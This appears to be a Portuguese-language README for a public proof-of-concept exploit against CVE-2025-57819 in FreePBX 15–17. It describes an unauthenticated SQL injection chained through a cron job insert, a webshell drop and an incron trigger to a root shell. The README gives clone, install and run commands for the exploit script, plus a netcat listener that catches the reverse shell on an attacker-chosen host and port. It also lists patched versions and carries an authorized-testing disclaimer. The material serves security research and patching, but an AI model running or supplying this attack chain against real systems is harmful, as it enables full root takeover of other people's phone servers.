
Cadeia completa de PoC para CVE-2025-57819 no FreePBX 15, 16 e 17: SQLi não autenticado para RCE e controle total do root.
PoC de cadeia completa para CVE-2025-57819. Injeção SQL baseada em erro não autenticada no módulo endpoint do FreePBX que encadeia em um shell root via injeção de cron job e escalonamento de privilégio incron.
Apenas para testes autorizados e pesquisa. Não utilize contra sistemas que não lhe pertencem.
SQLi (EXTRACTVALUE) → INSERT cron job → webshell drop → incron trigger → root shell
/admin/ajax.phpasteriskfwconsole como rootgit clone https://github.com/ozcanpng/CVE-2025-57819-FreePBX-RCE2Root
cd CVE-2025-57819-FreePBX-RCE2Root
pip install -r requirements.txt
python3 CVE-2025-57819.py <target> <lhost> <lport> [--cleanup]
Inicie um listener primeiro:
nc -lvnp 9999
Então execute:
python3 CVE-2025-57819.py freepbx.example.com 192.168.1.50 9999
--cleanup remove o webshell e o cron job após a exploração.
FreePBX com o módulo endpoint instalado. O parâmetro brand em /admin/ajax.php é passado sem sanitização para uma consulta SQL.
| FreePBX | Versão Corrigida |
|---|---|
| 15.x | 15.0.66 |
| 16.x | 16.0.89 |
| 17.x | 17.0.3 |
ozcanpng — github.com/ozcanpng — ozcanpng.dev